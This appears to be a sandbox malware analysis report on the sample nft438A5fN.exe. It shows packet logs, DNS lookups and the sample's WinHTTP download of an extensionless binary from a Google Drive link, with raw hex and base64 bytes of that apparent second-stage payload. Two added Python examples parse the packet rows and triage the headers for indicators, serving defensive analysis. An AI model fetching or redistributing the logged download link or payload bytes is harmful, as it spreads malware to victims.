                                                                    Nov 26, 2024 08:12:21.947634935 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.948457003 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.948499918 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.948503971 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.958003998 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.958077908 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.958084106 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.958513021 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.958566904 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.958573103 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.960129023 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.960175991 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.960181952 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.969033003 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.969113111 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.969121933 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.969474077 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.969518900 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.969525099 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.971122980 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.971168041 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.971174002 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.978779078 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.978841066 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.978847027 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.979994059 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.980043888 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.980050087 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.980887890 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.980935097 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.980940104 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.987620115 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.987696886 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.987703085 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.988075972 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.988123894 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.988130093 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.989742994 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.989795923 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.989800930 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.996819019 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.996876955 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.996882915 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.998024940 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.998075008 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.998080969 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.998923063 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:21.998970032 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:21.998975039 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.006495953 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.006555080 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.006560087 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.007407904 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.007466078 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.007469893 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.021286011 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.021353006 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.021358013 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.021709919 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.021768093 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.021771908 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.022578001 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.022628069 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.022633076 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.035593033 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.035674095 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.035679102 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.036122084 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.036180973 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.036185980 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.065408945 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.065442085 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.065448999 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.065498114 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.065507889 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.065552950 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.065581083 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.093779087 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.093810081 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.093889952 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.093902111 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.093911886 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.117199898 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.117238998 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.117322922 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.117333889 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.117363930 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.127551079 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.127582073 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.127624035 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.127633095 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.127688885 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.127765894 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.127826929 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.127870083 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.128632069 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.128648996 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:22.128668070 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:22.128673077 CET44349706142.250.181.129192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 26, 2024 08:12:14.071011066 CET | 56012 | 53 | 192.168.2.8 | 1.1.1.1
Nov 26, 2024 08:12:14.209933996 CET | 53 | 56012 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 26, 2024 08:12:14.071011066 CET | 192.168.2.8 | 1.1.1.1 | 0x98a0 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 26, 2024 08:12:14.209933996 CET | 1.1.1.1 | 192.168.2.8 | 0x98a0 | No error (0) | drive.usercontent.google.com | - | 142.250.181.129 | A (IP address) | IN (0x0001) | false
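Rows of the report's packet tables, as copied out of the HTML, arrive with their columns run together, for example "Nov 26, 2024 08:12:14.071011066 CET5601253192.168.2.81.1.1.1" for timestamp, source port, destination port, source IP and destination IP. Such a string usually admits several grammatically valid splits (here 56012/53 but also 5601/253 or 560/1253 with the same two addresses), so a mechanical split needs context. The following Python is an added example, not part of the Joe Sandbox report: it enumerates every valid port/port/IPv4/IPv4 split of a row and scores each one against context taken from this report (the analysis host 192.168.2.8, the resolver 1.1.1.1 and the A record 142.250.181.129 returned above), breaking ties with well-known ports. The four sample rows are copied from this page; the scoring weights and the well-known-port list are assumptions of the example.

```python
"""Recover the columns of sandbox packet rows whose fields were run together."""
import re
from dataclasses import dataclass
from typing import Dict, Iterator, List, Tuple

# Constructed sample input: four rows copied from this report's UDP and TCP tables.
FUSED_ROWS = [
    "Nov 26, 2024 08:12:14.071011066 CET5601253192.168.2.81.1.1.1",
    "Nov 26, 2024 08:12:14.209933996 CET53560121.1.1.1192.168.2.8",
    "Nov 26, 2024 08:12:21.863847971 CET44349706142.250.181.129192.168.2.8",
    "Nov 26, 2024 08:12:21.864032984 CET49706443192.168.2.8142.250.181.129",
]

# Context from the report: the analysis VM, its resolver, and the A record the
# resolver returned for drive.usercontent.google.com.
ANALYSIS_HOST = "192.168.2.8"
KNOWN_IPS = {ANALYSIS_HOST, "1.1.1.1", "142.250.181.129"}
# Assumption of this example: ports used only to break ties between equal splits.
WELL_KNOWN_PORTS = {53, 80, 443}

_ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]{3,4})"
    r"(?P<rest>\d.*)$"
)


@dataclass(frozen=True)
class Packet:
    timestamp: str
    src_port: int
    dst_port: int
    src_ip: str
    dst_ip: str
    ambiguous: bool  # another split scored just as well; check this row by hand


def _numbers(s: str, max_digits: int, limit: int) -> Iterator[Tuple[str, str]]:
    """Yield (decimal_prefix, remainder) for each prefix of s up to max_digits
    that is <= limit and has no leading zero ("0" alone is allowed)."""
    for n in range(1, max_digits + 1):
        d = s[:n]
        if len(d) < n or not d.isdigit() or (n > 1 and d[0] == "0") or int(d) > limit:
            return  # every longer prefix fails for the same reason
        yield d, s[n:]


def _ipv4(s: str) -> Iterator[Tuple[str, str]]:
    """Yield (dotted_quad, remainder) for every valid IPv4 address prefixing s."""
    def octets(s: str, left: int) -> Iterator[Tuple[List[str], str]]:
        for o, rest in _numbers(s, 3, 255):
            if left == 1:
                yield [o], rest          # last octet: no separator follows it
            elif rest.startswith("."):
                for more, rest2 in octets(rest[1:], left - 1):
                    yield [o, *more], rest2

    for parts, rest in octets(s, 4):
        yield ".".join(parts), rest


def _splits(rest: str) -> Iterator[Tuple[int, int, str, str]]:
    """Enumerate every <port><port><ip><ip> split that consumes the whole string."""
    for p1, r1 in _numbers(rest, 5, 65535):
        for p2, r2 in _numbers(r1, 5, 65535):
            for ip1, r3 in _ipv4(r2):
                for ip2, r4 in _ipv4(r3):
                    if r4 == "":
                        yield int(p1), int(p2), ip1, ip2


def _score(split: Tuple[int, int, str, str]) -> int:
    """Two points per address seen elsewhere in the report, one per well-known port."""
    p1, p2, ip1, ip2 = split
    return 2 * ((ip1 in KNOWN_IPS) + (ip2 in KNOWN_IPS)) + (p1 in WELL_KNOWN_PORTS) + (p2 in WELL_KNOWN_PORTS)


def parse_row(row: str) -> Packet:
    m = _ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    ranked = sorted(_splits(m["rest"]), key=_score, reverse=True)
    if not ranked:
        raise ValueError(f"no valid port/port/ip/ip split: {row!r}")
    tie = len(ranked) > 1 and _score(ranked[1]) == _score(ranked[0])
    return Packet(m["ts"], *ranked[0], tie)


def parse_rows(rows: List[str] = FUSED_ROWS) -> List[Packet]:
    return [parse_row(r) for r in rows]


def flows(packets: List[Packet]) -> Dict[Tuple[Tuple[str, int], Tuple[str, int]], int]:
    """Count packets per bidirectional flow, keyed (analysis-host endpoint, remote endpoint)."""
    counts: Dict[Tuple[Tuple[str, int], Tuple[str, int]], int] = {}
    for p in packets:
        src, dst = (p.src_ip, p.src_port), (p.dst_ip, p.dst_port)
        key = (src, dst) if p.src_ip == ANALYSIS_HOST else (dst, src)
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    parsed = parse_rows()
    for p in parsed:
        flag = " (ambiguous)" if p.ambiguous else ""
        print(f"{p.timestamp}  {p.src_ip}:{p.src_port} -> {p.dst_ip}:{p.dst_port}{flag}")
    for (local, remote), n in flows(parsed).items():
        print(f"{local[0]}:{local[1]} <-> {remote[0]}:{remote[1]}: {n} packets")
```

The `ambiguous` flag matters more than the winning split: when two candidates tie, the row should be resolved from the session table (which pairs 192.168.2.8:49706 with 142.250.181.129:443 and PID 520) rather than trusted blindly.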
                                                                    • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 142.250.181.129 | 443 | 520 | C:\Users\user\Desktop\nft438A5fN.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:12:16 UTC | 207 | OUT | GET /download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: drive.usercontent.google.com
2024-11-26 07:12:20 UTC | 4918 | IN | HTTP/1.1 200 OK
                                                                    Content-Type: application/octet-stream
                                                                    Content-Security-Policy: sandbox
                                                                    Content-Security-Policy: default-src 'none'
                                                                    Content-Security-Policy: frame-ancestors 'none'
                                                                    X-Content-Security-Policy: sandbox
                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                    Cross-Origin-Embedder-Policy: require-corp
                                                                    Cross-Origin-Resource-Policy: same-site
                                                                    X-Content-Type-Options: nosniff
                                                                    Content-Disposition: attachment; filename="222_Wuqtggvoyft"
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Credentials: false
                                                                    Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                    Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                    Accept-Ranges: bytes
                                                                    Content-Length: 1118012
                                                                    Last-Modified: Sun, 06 Oct 2024 20:54:40 GMT
                                                                    X-GUploader-UploadID: AFiumC7_j7Rl2PTrVvosEB1XKitNo_OYFi3moUvvpEUjJVapmgS0pDQBw6Truuv8dugDQe-HCf7MCvn0zg
                                                                    Date: Tue, 26 Nov 2024 07:12:19 GMT
                                                                    Expires: Tue, 26 Nov 2024 07:12:19 GMT
                                                                    Cache-Control: private, max-age=0
                                                                    X-Goog-Hash: crc32c=XynV0g==
                                                                    Server: UploadServer
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
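The request/response pair above is what an analyst would pull indicators from: the User-Agent names the WinHTTP COM object (WinHttp.WinHttpRequest.5) rather than a browser, the body is an opaque application/octet-stream served by a user-upload host, the attachment name "222_Wuqtggvoyft" has no extension, and X-Goog-Hash carries the crc32c Google computed over the full body. The Python below is an added example, not code from the report or the sample: it parses the two header blocks (copied from this page, with the response's long CORS header list omitted), collects those indicators, and decodes the crc32c so it can be compared with any file recovered from the sandbox. The indicator lists and the verdict threshold are assumptions of the example.

```python
"""Header-level triage of the download the sample made through WinHTTP."""
import base64
from typing import Dict, List, Tuple

# Copied from this report's HTTP data table (response headers abbreviated).
REQUEST = (
    "GET /download?id=1dnXhBmgnD9HLHSDJbmDBCMsTIXqIwKdi HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
    "Host: drive.usercontent.google.com\r\n"
    "\r\n"
)
RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/octet-stream\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    'Content-Disposition: attachment; filename="222_Wuqtggvoyft"\r\n'
    "Content-Length: 1118012\r\n"
    "Last-Modified: Sun, 06 Oct 2024 20:54:40 GMT\r\n"
    "X-Goog-Hash: crc32c=XynV0g==\r\n"
    "Server: UploadServer\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Assumptions of this example, not taken from the report.
SCRIPTED_UA_MARKERS = ("WinHttp.WinHttpRequest", "Microsoft BITS", "WindowsPowerShell", "python-requests")
FILE_SHARING_HOSTS = {"drive.usercontent.google.com", "drive.google.com", "dl.dropboxusercontent.com"}
MIN_INDICATORS_FOR_VERDICT = 3


def parse_http(text: str) -> Tuple[str, Dict[str, str]]:
    """Split a raw HTTP head into (start line, {lowercased name: value})."""
    head = text.split("\r\n\r\n", 1)[0]
    start, *lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return start, headers


def attachment_filename(content_disposition: str) -> str:
    """Return the filename parameter of a Content-Disposition value, unquoted."""
    for param in content_disposition.split(";")[1:]:
        key, _, value = param.strip().partition("=")
        if key.lower() == "filename":
            return value.strip().strip('"')
    return ""


def expected_crc32c(response: str = RESPONSE) -> str:
    """Decode X-Goog-Hash's crc32c (base64 of the big-endian CRC) to hex, for
    comparison with the checksum of a file recovered from the infected host."""
    _, headers = parse_http(response)
    for item in headers.get("x-goog-hash", "").split(","):
        algo, _, b64 = item.strip().partition("=")
        if algo == "crc32c":
            return base64.b64decode(b64).hex()
    return ""


def triage(request: str = REQUEST, response: str = RESPONSE) -> List[str]:
    """Collect the indicators an analyst would record for this exchange."""
    _, req = parse_http(request)
    _, resp = parse_http(response)
    findings: List[str] = []

    ua = req.get("user-agent", "")
    if any(marker in ua for marker in SCRIPTED_UA_MARKERS):
        findings.append(f"non-browser HTTP stack: {ua}")

    host = req.get("host", "").lower()
    if host in FILE_SHARING_HOSTS:
        findings.append(f"download from user-upload hosting: {host}")

    if resp.get("content-type", "").split(";")[0].strip() == "application/octet-stream":
        findings.append("opaque binary body (application/octet-stream)")

    name = attachment_filename(resp.get("content-disposition", ""))
    if name and "." not in name:
        findings.append(f"attachment served without a file extension: {name}")

    return findings


def verdict(findings: List[str]) -> str:
    if len(findings) >= MIN_INDICATORS_FOR_VERDICT:
        return "likely second-stage payload fetch"
    return "inconclusive"


if __name__ == "__main__":
    found = triage()
    for f in found:
        print("-", f)
    print(verdict(found), "| expected body crc32c:", expected_crc32c())
```

Only the first bytes of the body appear in the report, so the checksum cannot be verified from this page alone; it becomes useful once the 1,118,012-byte file is recovered from disk or a full capture.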
                                                                    2024-11-26 07:12:20 UTC4918INData Raw: 6d 36 4f 61 54 68 69 63 70 6b 41 45 41 78 55 4a 47 51 59 46 42 77 77 63 42 51 6f 5a 47 77 4d 4b 44 68 55 4d 47 78 63 4b 43 68 4d 63 44 42 73 5a 44 78 73 4e 44 77 63 47 43 42 59 49 47 68 41 51 46 41 73 4b 41 77 4d 61 46 51 51 4a 43 51 59 58 48 41 6b 62 43 52 73 63 42 51 6b 57 47 42 51 47 46 42 67 50 43 68 6f 51 46 67 34 53 45 67 55 51 45 77 51 47 41 78 6b 58 48 41 34 49 47 41 55 53 42 42 41 63 42 42 59 51 47 52 51 45 43 52 55 61 47 67 38 45 47 68 59 50 43 41 51 56 47 77 38 53 47 42 6b 62 46 67 6f 46 45 52 67 55 46 52 6d 62 6f 35 70 4f 47 4a 79 6d 51 50 6b 58 45 78 59 4a 43 52 67 52 47 77 67 57 6d 36 4f 61 54 68 69 63 70 6b 43 5a 6e 4b 71 65 72 70 2b 61 6f 4a 47 68 6f 6f 42 70 41 46 2b 2f 36 4e 70 52 4d 58 7a 56 72 44 45 33 54 62 44 72 79 43 62 32 4c 62 61
                                                                    Data Ascii: m6OaThicpkAEAxUJGQYFBwwcBQoZGwMKDhUMGxcKChMcDBsZDxsNDwcGCBYIGhAQFAsKAwMaFQQJCQYXHAkbCRscBQkWGBQGFBgPChoQFg4SEgUQEwQGAxkXHA4IGAUSBBAcBBYQGRQECRUaGg8EGhYPCAQVGw8SGBkbFgoFERgUFRmbo5pOGJymQPkXExYJCRgRGwgWm6OaThicpkCZnKqerp+aoJGhooBpAF+/6NpRMXzVrDE3TbDryCb2Lba
                                                                    2024-11-26 07:12:20 UTC4862INData Raw: 62 69 4a 39 67 2f 35 44 48 6f 4d 73 51 6e 76 7a 5a 4c 50 66 67 6e 4f 7a 45 6d 49 7a 45 32 78 43 69 7a 4d 37 34 38 70 79 32 61 4b 5a 55 30 6d 6a 46 78 4a 34 6f 68 64 69 4b 4b 49 31 6b 38 57 69 35 57 50 32 77 75 45 44 55 43 50 77 6b 75 46 44 66 36 4c 50 55 78 33 54 2f 54 4b 2b 55 69 38 44 4b 34 50 72 67 6f 51 53 2f 31 4a 79 49 2b 4f 43 51 30 49 62 38 7a 75 53 47 30 49 61 77 38 6d 76 47 58 4d 5a 6b 6a 67 54 46 34 4c 33 73 70 66 79 74 6a 4e 31 6f 70 56 43 56 76 4a 68 63 79 45 69 73 57 4d 52 73 33 51 43 6e 79 4a 65 49 70 36 7a 58 6f 38 64 38 2f 7a 69 72 41 50 30 4d 71 2b 79 55 30 50 69 49 33 49 54 41 6d 4d 38 38 6b 77 6a 47 6c 4e 4b 6f 69 71 44 4f 71 4e 33 4d 6a 66 43 70 39 49 34 63 33 63 43 46 58 4c 46 59 71 57 44 55 51 4b 46 41 36 48 6a 6b 4c 4c 51 45 72 51
                                                                    Data Ascii: biJ9g/5DHoMsQnvzZLPfgnOzEmIzE2xCizM748py2aKZU0mjFxJ4ohdiKKI1k8Wi5WP2wuEDUCPwkuFDf6LPUx3T/TK+Ui8DK4PrgoQS/1JyI+OCQ0Ib8zuSG0Iaw8mvGXMZkjgTF4L3spfytjN1opVCVvJhcyEisWMRs3QCnyJeIp6zXo8d8/zirAP0Mq+yU0PiI3ITAmM88kwjGlNKoiqDOqN3MjfCp9I4c3cCFXLFYqWDUQKFA6HjkLLQErQ
                                                                    2024-11-26 07:12:20 UTC1322INData Raw: 53 79 6a 58 4f 72 38 75 2f 43 32 71 4d 48 4b 6b 6e 71 54 73 6d 70 75 76 72 61 6d 66 4e 6e 6b 70 42 6a 7a 66 4d 4f 38 30 52 43 66 31 4e 46 51 68 6d 6a 47 44 50 49 6e 78 67 43 56 76 4a 45 45 38 30 6a 4c 56 4d 64 51 6b 38 44 53 48 50 34 30 6c 59 44 4d 56 49 64 34 30 52 53 72 41 4e 70 30 35 6a 79 69 51 4c 33 34 7a 6e 44 59 59 49 70 49 6b 45 53 69 4f 4b 56 63 32 62 53 51 53 4e 52 59 6b 77 44 2f 36 4e 54 73 6b 4d 44 78 65 4a 38 6f 35 43 54 63 62 49 30 55 71 31 7a 72 6b 4e 75 66 78 4b 43 65 66 4c 71 51 33 68 69 30 4b 4b 4f 73 36 78 43 67 73 4b 4b 77 79 66 79 38 45 50 67 4d 73 44 54 35 4c 38 64 41 6d 77 43 57 44 4f 57 34 6e 4b 43 76 51 4b 33 63 2f 46 43 62 6a 50 4f 38 36 73 69 52 41 4b 4c 34 6c 6d 44 6d 71 4c 48 55 7a 63 79 5a 57 4d 78 59 6d 30 35 6d 71 70 47 69
                                                                    Data Ascii: SyjXOr8u/C2qMHKknqTsmpuvramfNnkpBjzfMO80RCf1NFQhmjGDPInxgCVvJEE80jLVMdQk8DSHP40lYDMVId40RSrANp05jyiQL34znDYYIpIkESiOKVc2bSQSNRYkwD/6NTskMDxeJ8o5CTcbI0Uq1zrkNufxKCefLqQ3hi0KKOs6xCgsKKwyfy8EPgMsDT5L8dAmwCWDOW4nKCvQK3c/FCbjPO86siRAKL4lmDmqLHUzcyZWMxYm05mqpGi
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 45 63 50 39 59 38 76 7a 78 4c 4a 76 6f 78 4d 7a 63 70 4e 7a 38 6f 4e 44 33 4e 4d 5a 73 32 6d 43 57 6d 4e 34 67 69 59 54 45 58 50 42 7a 78 34 69 58 74 4a 4e 67 38 75 44 4b 33 4d 54 55 6b 4d 7a 55 6e 50 36 45 6c 66 44 4f 47 49 56 67 30 59 69 6f 65 4d 51 45 2b 51 43 2f 30 4b 45 67 31 4d 6a 43 55 49 59 38 6e 6a 69 53 46 4a 59 45 36 62 69 67 45 4f 55 6b 6f 32 54 50 63 4f 64 49 6f 73 54 46 41 4b 73 51 33 79 7a 6e 49 4c 5a 4d 6c 65 44 57 47 4f 58 41 76 58 53 68 6b 38 52 45 35 38 79 50 61 4a 76 67 30 52 53 59 39 4a 6a 59 37 77 69 61 68 4e 4a 34 6d 68 7a 52 39 4b 6e 30 73 62 53 34 58 4d 6b 49 73 41 66 46 50 49 2b 73 33 7a 43 34 70 4e 4a 45 79 6d 79 32 67 49 5a 30 74 66 44 46 56 4a 42 6b 37 47 79 34 4f 4f 77 63 75 30 79 48 75 4f 72 30 7a 79 54 52 4d 4e 2f 4c 78 4d
                                                                    Data Ascii: EcP9Y8vzxLJvoxMzcpNz8oND3NMZs2mCWmN4giYTEXPBzx4iXtJNg8uDK3MTUkMzUnP6ElfDOGIVg0YioeMQE+QC/0KEg1MjCUIY8njiSFJYE6bigEOUko2TPcOdIosTFAKsQ3yznILZMleDWGOXAvXShk8RE58yPaJvg0RSY9JjY7wiahNJ4mhzR9Kn0sbS4XMkIsAfFPI+s3zC4pNJEymy2gIZ0tfDFVJBk7Gy4OOwcu0yHuOr0zyTRMN/LxM
                                                                    2024-11-26 07:12:20 UTC1390INData Raw: 53 79 35 53 4e 51 6f 36 36 43 52 4e 49 67 51 2f 50 7a 6f 39 4c 35 73 70 62 79 77 2f 4c 48 63 7a 58 79 45 67 4d 42 4d 68 45 7a 6f 30 4d 39 59 6a 47 71 79 68 6b 55 4b 75 6c 4b 53 53 4b 58 72 78 67 44 42 66 50 56 4d 72 55 43 78 42 4a 4e 63 39 38 43 65 57 49 63 4d 79 6a 53 55 46 4a 66 63 79 6b 53 37 65 50 44 6b 75 6f 7a 31 35 49 7a 51 6c 74 4a 65 72 71 79 69 56 72 36 6d 66 6e 4b 34 78 59 79 67 47 4e 4f 51 79 6e 79 31 56 49 56 38 74 45 7a 45 43 4a 42 38 37 46 43 34 57 4f 77 67 75 47 69 45 4c 4f 6b 73 7a 39 6a 54 64 4f 6d 49 72 73 36 32 70 71 6a 79 5a 6e 34 71 65 72 70 38 75 51 79 66 36 4c 6b 59 36 39 53 7a 65 49 65 4d 6e 35 54 6a 53 4a 70 41 30 38 44 66 58 49 39 55 6c 35 53 75 79 4b 4d 59 6f 78 76 47 34 50 56 67 6e 2b 43 35 4c 50 50 38 6f 2f 69 73 79 4e 53 51
